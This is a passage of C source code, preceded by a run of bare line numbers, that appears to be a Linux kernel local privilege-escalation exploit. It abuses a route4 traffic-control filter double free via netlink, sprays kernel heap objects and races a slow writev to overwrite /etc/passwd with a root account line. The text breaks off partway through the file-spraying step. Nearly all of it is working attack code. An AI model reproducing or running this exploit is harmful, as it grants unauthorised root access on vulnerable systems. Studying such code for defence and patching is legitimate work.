178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
// $ gcc -static -pthread -O0 ./exploit.c -o ./exploit
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>

#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>

#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>

#include <x86intrin.h>
#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/utsname.h>

char* target = "/etc/passwd"; // path of the file to be overwritten
char* overwrite = "hi:x:0:0:root:/:/bin/sh\n"; // line to write; alternative: "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash\n"
char* global;
char* self_path;
char* content; // evil data + existing data in the target file

#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000

int fds[MAX_FILE_NUM] = {};
int fd_2[MAX_FILE_NUM] = {};
int overlap_a = -1; // unprivileged `file`
int overlap_b = -1; // privileged `file`

int cpu_cores = 0; // number of CPU cores
int sockfd = -1;

// Spray counts; adjust_rlimit() lowers both when the larger RLIMIT_NOFILE is refused.
int spray_num_1 = 2000; // NOTE(review): trailing 4000 presumably an earlier/alternative value
int spray_num_2 = 4000; // NOTE(review): trailing 5000 presumably an earlier/alternative value

int pipe_main[2]; // pipes used to notify processes when to execute
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];

int run_write = 0; // let thread 2 begin to write evil data
int run_spray = 0; // let thread 3 begin to spray privileged `file`
bool overlapped = false;

// Dump `size` bytes of `buf` to stdout as 64-bit hexadecimal words, two words
// per row, each row prefixed with its row index. Bytes beyond the last whole
// 8-byte word are not printed.
void print_hex(char* buf, int size) {
    const int words = size / 8;

    puts("======================================");
    printf("data :\n");
    for (int i = 0; i < words; i++) {
        uint64_t word;

        // Copy instead of dereferencing a cast pointer: buf need not be
        // 8-byte aligned, and the value must match the %llx conversion.
        memcpy(&word, buf + i * 8, sizeof(word));

        if (i % 2 == 0) {
            printf("%d", i / 2);
        }
        printf(" %16llx", (unsigned long long)word);
        if (i % 2 == 1) {
            printf("\n");
        }
    }
    // An odd word count leaves the last row open; close it so the footer
    // starts on its own line.
    if (words % 2 == 1) {
        printf("\n");
    }
    puts("======================================");
}
// Restrict the caller (pid 0 in sched_setaffinity) to the single CPU `cpu`.
// Prints the error and exits with EXIT_FAILURE if the affinity cannot be set.
void pin_on_cpu(int cpu) {
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask) == 0)
        return;

    perror("sched_setaffinity()");
    exit(EXIT_FAILURE);
}

// Format `what` (printf-style, truncated to 1023 bytes) and write the result
// to the already-existing file `file`.
// Returns true only if the whole string was written by a single write();
// on a failed or short write errno is left as write() set it.
static bool write_file(const char* file, const char* what, ...) {
    char text[1024];
    va_list ap;

    va_start(ap, what);
    vsnprintf(text, sizeof(text), what, ap);
    va_end(ap);
    text[sizeof(text) - 1] = 0;

    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;

    int want = strlen(text);
    bool ok = (write(fd, text, want) == want);
    int saved_errno = errno;  // close() below may overwrite errno

    close(fd);
    if (!ok)
        errno = saved_errno;
    return ok;
}
// Recreate ./exp_dir containing empty `data` and `data2` files, make the
// directory mode 0777, chdir into it and create the symlink `uaf` -> `data`.
// Exits with status 1 if chmod() or chdir() fails; the results of system()
// and symlink() are not checked.
static void use_temporary_dir(void) {
    const char* workdir = "exp_dir";

    system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
    system("touch exp_dir/data2");

    if (chmod(workdir, 0777) != 0 || chdir(workdir) != 0)
        exit(1);

    symlink("./data", "./uaf");
}
// Set the process resource limits used by the rest of the program.
// The address-space, locked-memory, stack and core limits are set
// best-effort (failures ignored). RLIMIT_NOFILE is raised to 14096 so that
// many files can be open at once; if that is refused, 4096 is tried with
// reduced spray counts, and the program exits if that fails as well.
static void adjust_rlimit() {
    static const struct {
        int resource;
        rlim_t limit;
    } fixed_limits[] = {
        { RLIMIT_AS,      200 << 20 },
        { RLIMIT_MEMLOCK, 32 << 20 },
        { RLIMIT_STACK,   1 << 20 },
        { RLIMIT_CORE,    0 },
    };
    struct rlimit rlim;

    for (size_t i = 0; i < sizeof(fixed_limits) / sizeof(fixed_limits[0]); i++) {
        rlim.rlim_cur = rlim.rlim_max = fixed_limits[i].limit;
        setrlimit(fixed_limits[i].resource, &rlim);
    }

    // Preferred descriptor limit.
    rlim.rlim_cur = rlim.rlim_max = 14096;
    if (setrlimit(RLIMIT_NOFILE, &rlim) >= 0)
        return;

    // Fallback: smaller descriptor limit, so spray fewer files.
    rlim.rlim_cur = rlim.rlim_max = 4096;
    spray_num_1 = 1200;
    spray_num_2 = 2800;
    if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
        perror("[-] setrlimit");
        err(1, "[-] setrlimit");
    }
}

// Enter a new user namespace and a new network namespace, then map the
// caller's real UID/GID to ID 0 inside the user namespace.
// "deny" is written to /proc/self/setgroups before gid_map is written.
// Any failure is reported with perror() and terminates the process.
void setup_namespace() {
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0) {
        // Report the flag that actually failed (was a copy of the message above).
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    if (!write_file("/proc/self/setgroups", "deny")) {
        // Message now names the file that was really written.
        perror("[-] write_file(/proc/self/setgroups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}

// One-time process setup, run in this order:
//   1. adjust_rlimit()     - resource limits
//   2. use_temporary_dir() - create and enter the working directory
//   3. setup_namespace()   - unshare user/network namespaces and write the ID maps
void pre_exploit() {
adjust_rlimit();
use_temporary_dir();
setup_namespace();
}

// Address just past the aligned end of netlink message `nmsg`, i.e. where the
// next attribute is appended. Uses char* arithmetic because arithmetic on
// void* is a GNU extension rather than ISO C.
#define NLMSG_TAIL(nmsg) \
    ((struct rtattr *)(((char *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
// Write one rtattr (header plus `len` payload bytes copied from `data`) at
// `attr`. The caller must provide at least RTA_LENGTH(len) writable bytes.
// Returns the attribute length, RTA_LENGTH(len).
int addattr(char* attr, int type, void* data, int len) {
    struct rtattr* rta = (struct rtattr*)attr;
    const int total = RTA_LENGTH(len);

    rta->rta_type = type;
    rta->rta_len = total;
    if (len != 0)
        memcpy(RTA_DATA(rta), data, len);

    return total;
}
// Append one attribute of `type` with `alen` payload bytes to netlink
// message `n` and grow n->nlmsg_len accordingly.
// Returns 0 on success, or -1 (after printing a diagnostic to stderr) when
// the grown message would exceed `maxlen` bytes; `n` is untouched in that case.
int addattr_l(struct nlmsghdr* n, int maxlen, int type, const void* data, int alen) {
    const int attr_len = RTA_LENGTH(alen);
    struct rtattr* slot;

    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(attr_len) > maxlen) {
        fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen);
        return -1;
    }

    slot = NLMSG_TAIL(n);
    slot->rta_type = type;
    slot->rta_len = attr_len;
    if (alen != 0)
        memcpy(RTA_DATA(slot), data, alen);

    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(attr_len);
    return 0;
}

// Open a nested attribute of `type` at the current tail of `n` by appending
// an empty attribute there. Returns a pointer to that attribute so
// addattr_nest_end() can later fix up its length. The result of addattr_l()
// is not checked.
struct rtattr* addattr_nest(struct nlmsghdr* n, int maxlen, int type) {
    struct rtattr* opened = NLMSG_TAIL(n);  // capture before the tail moves

    addattr_l(n, maxlen, type, NULL, 0);
    return opened;
}

// Close a nested attribute: set nest->rta_len to the distance from `nest` to
// the current tail of `n`, so that it spans everything appended since
// addattr_nest(). Returns the current message length.
int addattr_nest_end(struct nlmsghdr* n, struct rtattr* nest) {
    char* tail = (char*)NLMSG_TAIL(n);

    nest->rta_len = tail - (char*)nest;
    return n->nlmsg_len;
}
// Send an RTM_NEWQDISC netlink request on socket `fd` that creates an "sfq"
// qdisc with parent TC_H_ROOT on interface index 1.
// Returns the result of sendmsg(), or -1 if the request buffer could not be
// allocated. The buffer is released before returning and errno from
// sendmsg() is preserved.
int add_qdisc(int fd) {
    enum { BUF_SIZE = 0x1000 };
    char* start = calloc(1, BUF_SIZE);
    if (!start)
        return -1;

    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // new qdisc nlmsghdr + tcmsg
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

    // target interface (index 1) and attachment point
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = TC_H_ROOT;

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    // "sfq" must be available in the running kernel for this request to succeed
    addattr_l(msg, BUF_SIZE, TCA_KIND, "sfq", 4);

    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    int sent = sendmsg(fd, &msgh, 0);
    int saved_errno = errno;  // keep sendmsg()'s errno across free()

    free(start);
    errno = saved_errno;
    return sent;
}
// Send one RTM_NEWTFILTER netlink request on socket `fd` for a "route"
// classifier filter on interface index 1, with the given `handle`, the
// TCA_ROUTE4_FROM / TCA_ROUTE4_TO options `from` / `to`, and extra netlink
// flags `flags` (NLM_F_REQUEST is always set).
// Returns 1 once the request has been handed to sendmsg() (the send result
// itself is not reported), or -1 if the request buffer could not be allocated.
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle, u_int16_t flags) {
    enum { BUF_SIZE = 0x2000, ATTR_LIMIT = 0x1000 };
    char* start = calloc(1, BUF_SIZE);
    if (!start)
        return -1;

    // The message starts at the beginning of the zeroed buffer.
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // new filter
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, ATTR_LIMIT, TCA_KIND, "route", 6);
    struct rtattr* tail = addattr_nest(msg, ATTR_LIMIT, TCA_OPTIONS);
    addattr_l(msg, ATTR_LIMIT, TCA_ROUTE4_FROM, &from, 4);
    addattr_l(msg, ATTR_LIMIT, TCA_ROUTE4_TO, &to, 4);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(fd, &msgh, 0);
    free(start);
    return 1;
}

/*
 * Convenience wrapper around add_tc_(): FROM is 0, TO is `handle`, and the
 * filter handle is derived from `handle` as (handle << 8) + handle.
 * `flag` is passed through as the extra netlink flags.
 */
void add_tc(int sockfd, uint32_t handle, uint16_t flag) {
    const uint32_t filter_handle = (handle << 8) + handle;

    add_tc_(sockfd, 0, handle, filter_handle, flag);
}

/*
 * Pack a (from, to) pair into a 32-bit handle: `to` in the low bits and
 * `from` shifted left by 16.
 *
 * Both inputs must be <= 0xff (enforced with assert).
 * Returns the packed handle, or 0 when the packed value is 0, has bit 15 set,
 * or changes when OR-ed with its own 0x7f00 bits.
 */
uint32_t calc_handle(uint32_t from, uint32_t to) {
    assert(from <= 0xff && to <= 0xff);

    const uint32_t packed = (from << 16) | to;
    const uint32_t remasked = packed | (packed & 0x7f00);

    if (remasked != packed || packed == 0 || (packed & 0x8000) != 0)
        return 0;

    return packed;
}

/*
 * Send an RTM_DELTFILTER request for the "route" filter with the given
 * `handle` (interface index 1, prio 1 / protocol 1) and read one reply.
 *
 * The request carries NLM_F_ECHO. After sending, the same 0x4000-byte buffer
 * is zeroed and reused as the receive buffer for a single recvmsg().
 *
 * Returns that heap buffer holding whatever recvmsg() stored; the caller owns
 * it and is responsible for free(). Results of sendmsg()/recvmsg() are not
 * inspected.
 */
void* delete_tc_(int sockfd, u_int32_t handle) {
    enum { BUF_SIZE = 0x4000, ATTR_LIMIT = 0x1000 };
    const u_int32_t prio = 1;
    const u_int32_t protocol = 1;

    char* buf = malloc(BUF_SIZE);
    memset(buf, 0, BUF_SIZE);

    // netlink header
    struct nlmsghdr* nlh = (struct nlmsghdr*)buf;
    nlh->nlmsg_type = RTM_DELTFILTER;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
    nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));

    // traffic-control header
    struct tcmsg* tcm = (struct tcmsg*)(buf + sizeof(struct nlmsghdr));
    tcm->tcm_family = AF_UNSPEC;
    tcm->tcm_ifindex = 1;
    tcm->tcm_handle = handle;
    tcm->tcm_info = TC_H_MAKE(prio << 16, protocol);

    // TCA_KIND plus an empty TCA_OPTIONS nest
    addattr_l(nlh, ATTR_LIMIT, TCA_KIND, "route", 6);
    struct rtattr* options = addattr_nest(nlh, ATTR_LIMIT, TCA_OPTIONS);
    addattr_nest_end(nlh, options);

    struct sockaddr_nl peer = { .nl_family = AF_NETLINK };
    struct iovec vec = { .iov_base = nlh, .iov_len = nlh->nlmsg_len };
    struct msghdr io = {
        .msg_name = &peer,
        .msg_namelen = sizeof(peer),
        .msg_iov = &vec,
        .msg_iovlen = 1,
    };

    sendmsg(sockfd, &io, 0);

    // Reuse the whole buffer for the reply.
    memset(buf, 0, BUF_SIZE);
    vec.iov_base = buf;
    vec.iov_len = BUF_SIZE;
    recvmsg(sockfd, &io, 0);

    if (io.msg_namelen != sizeof(peer))
        printf("[-] size of sender address is wrong\n");

    return buf;
}

/*
 * Convenience wrapper around delete_tc_(): deletes the filter whose handle is
 * (handle << 8) + handle, the same derivation add_tc() uses when creating it.
 *
 * delete_tc_() hands back a heap-allocated reply buffer; it is not needed
 * here, so it is released immediately instead of being leaked.
 */
void delete_tc(int sockfd, uint32_t handle) {
    free(delete_tc_(sockfd, ((handle) << 8) + (handle)));
}

// add_tc_basic() - send one RTM_NEWTFILTER request for a "basic" classifier
// whose ematch tree carries caller-supplied data.
//
//   fd           netlink socket to send on
//   handle       filter handle (tcm_handle)
//   spray_data   bytes copied into every TCA_EM_META_LVALUE / _RVALUE attribute
//   spray_len    length of spray_data in bytes
//   spray_count  number of copies of spray_data to embed; spray_count / 2
//                meta ematches are emitted, each holding two copies
//
// spray_len * spray_count must stay below 0x3000 (asserted) so that one
// ematch fits the scratch buffer. The sendmsg() result is not inspected.
// Returns 1 after sending, or -1 if a buffer cannot be allocated.
int add_tc_basic(int fd, uint32_t handle, void* spray_data, size_t spray_len, int spray_count) {
    assert(spray_len * spray_count < 0x3000);
    char* start = malloc(0x4000);
    if (start == NULL)
        return -1;
    memset(start, 0, 0x4000);
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // new filter nlmsghdr + tcmsg
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWTFILTER;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    // TCA_KIND, then TCA_OPTIONS { TCA_BASIC_EMATCHES { tree header, tree list } }
    addattr_l(msg, 0x4000, TCA_KIND, "basic", 6);
    struct rtattr* tail = addattr_nest(msg, 0x4000, TCA_OPTIONS);
    struct rtattr* ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES);
    struct tcf_ematch_tree_hdr tree_hdr = { .nmatches = spray_count / 2,
                                            .progid = 0 };

    addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr));
    struct rtattr* rt_match_tail = addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);

    // Scratch buffer in which each ematch is assembled before being appended.
    char* data = malloc(0x3000);
    if (data == NULL) {
        free(start);
        return -1;
    }
    for (int i = 0; i < tree_hdr.nmatches; i++) {
        char* current;
        memset(data, 0, 0x3000);
        struct tcf_ematch_hdr* hdr = (struct tcf_ematch_hdr*)data;
        hdr->kind = TCF_EM_META;
        hdr->flags = TCF_EM_REL_AND;

        current = data + sizeof(*hdr);

        struct tcf_meta_hdr meta_hdr = {
            .left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
            .right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
        };

        // The payload length is the size of meta_hdr itself. The previous
        // sizeof(hdr) measured a pointer and only matched by coincidence.
        current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(meta_hdr));
        current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len);
        current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);

        // Entries in the tree list use attribute types 1..nmatches.
        addattr_l(msg, 0x4000, i + 1, data, current - data);
    }

    // Close the nests innermost first.
    addattr_nest_end(msg, rt_match_tail);
    addattr_nest_end(msg, ema_tail);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    sendmsg(fd, &msgh, 0);
    free(data);
    free(start);
    return 1;
}

/*
 * Send an RTM_DELTFILTER request for the "basic" filter with the given
 * `handle` (interface index 1, prio 1 / protocol 1) and read one reply.
 *
 * Mirrors delete_tc_() except for the classifier kind. The 0x4000-byte
 * request buffer is zeroed after sending and reused for a single recvmsg().
 *
 * Returns that heap buffer; ownership passes to the caller, who must free()
 * it. Results of sendmsg()/recvmsg() are not inspected.
 */
void* delete_tc_basic(int sockfd, u_int32_t handle) {
    const size_t buf_size = 0x4000;
    const int attr_limit = 0x1000;
    const u_int32_t prio = 1;
    const u_int32_t protocol = 1;

    char* buf = malloc(buf_size);
    memset(buf, 0, buf_size);

    // netlink header followed by the traffic-control header
    struct nlmsghdr* nlh = (struct nlmsghdr*)buf;
    struct tcmsg* tcm = (struct tcmsg*)(buf + sizeof(struct nlmsghdr));

    nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    nlh->nlmsg_type = RTM_DELTFILTER;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;

    tcm->tcm_handle = handle;
    tcm->tcm_ifindex = 1;
    tcm->tcm_family = AF_UNSPEC;
    tcm->tcm_info = TC_H_MAKE(prio << 16, protocol);

    // TCA_KIND plus an empty TCA_OPTIONS nest
    addattr_l(nlh, attr_limit, TCA_KIND, "basic", 6);
    addattr_nest_end(nlh, addattr_nest(nlh, attr_limit, TCA_OPTIONS));

    struct sockaddr_nl peer = { .nl_family = AF_NETLINK };
    struct iovec vec = { .iov_base = nlh, .iov_len = nlh->nlmsg_len };
    struct msghdr io = {
        .msg_name = &peer,
        .msg_namelen = sizeof(peer),
        .msg_iov = &vec,
        .msg_iovlen = 1,
    };

    sendmsg(sockfd, &io, 0);

    // Turn the request buffer into the receive buffer.
    memset(buf, 0, buf_size);
    vec.iov_len = buf_size;
    vec.iov_base = buf;
    recvmsg(sockfd, &io, 0);

    if (io.msg_namelen != sizeof(peer))
        printf("[-] size of sender address is wrong\n");

    return buf;
}
// slow_write() - thread 1: issue one very large writev() on "./uaf".
//
// Maps 0x80000 / 20 anonymous pages one by one starting at the address hint
// 0x30000000, then submits 20 iovecs that all start at that base and each
// span the whole mapped length (roughly 2 GiB in total). run_write is raised
// just before the writev() and cleared once it returns, so other threads can
// tell when the write is in progress.
// Exits the process if "./uaf" cannot be opened. Always returns NULL.
void* slow_write() {
    printf("[11-1] start slow write\n");
    clock_t start, end;
    int fd = open("./uaf", 1);  // 1 == O_WRONLY on Linux
    if (fd < 0) {
        perror("[-] error open uaf file");
        exit(-1);
    }

    unsigned long int addr = 0x30000000;
    int offset;
    for (offset = 0; offset < 0x80000 / 20; offset++) {
        // NOTE(review): the address is only a hint (no MAP_FIXED); the code
        // below assumes the pages really end up contiguous from `addr`.
        void* r = mmap((void*)(addr + offset * 0x1000), 0x1000,
                       PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
        // mmap() reports failure with MAP_FAILED, never with a "negative"
        // pointer, so the old `r < 0` test could not fire.
        if (r == MAP_FAILED)
            printf("[-] allocate failed at 0x%x\n", offset);
    }
    assert(offset > 0);

    void* mem = (void*)(addr);
    memcpy(mem, "hhhhh", 5);
    struct iovec iov[20];
    for (int i = 0; i < 20; i++) {
        iov[i].iov_base = mem;
        iov[i].iov_len = offset * 0x1000;
    }

    run_write = 1;  // tell thread 2 (write_cmd) that the slow write is starting
    start = clock();

    if (writev(fd, iov, 20) < 0)
        perror("slow write");
    end = clock();
    double spent = (double)(end - start) / CLOCKS_PER_SEC;
    printf("[*] write done, spent %f s\n", spent);
    run_write = 0;

    // A pthread start routine must return a value; falling off the end of a
    // non-void function is undefined once the thread library reads it.
    return NULL;
}
// write_cmd() - thread 2: once slow_write() has raised run_write, write the
// prepared `content` buffer through the descriptor overlap_a.
//
// run_spray is raised immediately before the writev() so that the thread
// waiting in exploit() can continue. Always returns NULL.
void* write_cmd() {
    struct iovec iov = { .iov_base = content, .iov_len = strlen(content) };

    while (!run_write) {}  // busy-wait until thread 1 is about to write
    printf("[11-2] write evil data after the slow write\n");
    run_spray = 1;
    if (writev(overlap_a, &iov, 1) < 0)
        printf("[-] failed to write\n");

    // A pthread start routine must return a value.
    return NULL;
}

// exploit() - main sequence of the proof of concept, run in its own process.
//
// It is kept in lock-step with the heap-grooming process started by run_exp():
// before each of steps 3, 6 and 8 it blocks on a 2-byte token read from
// pipe_child[0], and after steps 3 and 6 it answers with "OK" on
// pipe_parent[1]. Later it drives the file-spraying process through
// pipe_file_spray.
// The outcome is reported as one byte on pipe_main[1]: 0x00 when the target
// file starts with "hi", 0xff otherwise. The function never returns; it ends
// in an endless sleep loop.
void exploit() {
char msg[0x10] = {};
// NOTE(review): lim and new_lim are declared but never used below.
struct rlimit old_lim, lim, new_lim;

// Get old limits
if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
printf("Old limits -> soft limit= %ld \t"
" hard limit= %ld \n",
old_lim.rlim_cur, old_lim.rlim_max);
pin_on_cpu(0);
printf("[*] starting exploit, num of cores: %d\n", cpu_cores);
// open a netlink socket and create the qdisc the filters will attach to
sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sockfd != -1);
add_qdisc(sockfd);
// 3. allocate a route4_filter (vulnerable object)
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");
printf("[3] allocate the vulnerable filter\n");
add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE); // handle = 0

if (write(pipe_parent[1], "OK", 2) != 2)
err(1, "[-] write to child");
// 6. 1st free the route4_filter, return the `kmalloc-256` page to the page allocator
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");

// free the object, to free the slab
printf("[6] 1st freed the filter object\n");
// same handle (0) as step 3, but with different FROM/TO values
add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE); // handle = 0

// wait for the vulnerable object being freed
usleep(500 * 1000);
if (write(pipe_parent[1], "OK", 2) != 2)
err(1, "[-] write to child");
// 8. spray 4000 unprivileged `file`
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");

usleep(1000 * 1000);
printf("[8] spray 4000 uprivileged `file`\n");
// open "./data2" spray_num_1 times, rotating over the available CPUs;
// flag 1 is O_WRONLY on Linux
for (int i = 0; i < spray_num_1; i++) {
pin_on_cpu(i % cpu_cores);
fds[i] = open("./data2", 1);
assert(fds[i] > 0);
}
// 9. 2nd free route4_filter, which will free the file
printf("[9] 2nd free the filter object\n");
add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE); // handle = 0
printf("pause after 2nd free\n");
usleep(1000 * 100); // should not sleep too long, otherwise file might be claimed by others

// 10. spray 5000 unprivileged `file` & find the overlapped file
printf("[10] spraying 5000 unprivileged `file`\n");
for (int i = 0; i < spray_num_2; i++) {
pin_on_cpu(i % cpu_cores);
fd_2[i] = open("./uaf", 1);
assert(fd_2[i] > 0);
// compare the descriptor just opened against every descriptor from step 8
for (int j = 0; j < spray_num_1; j++) {
// 10-1. spray one `file` & use kcmp to check if we take up the vulnerable object
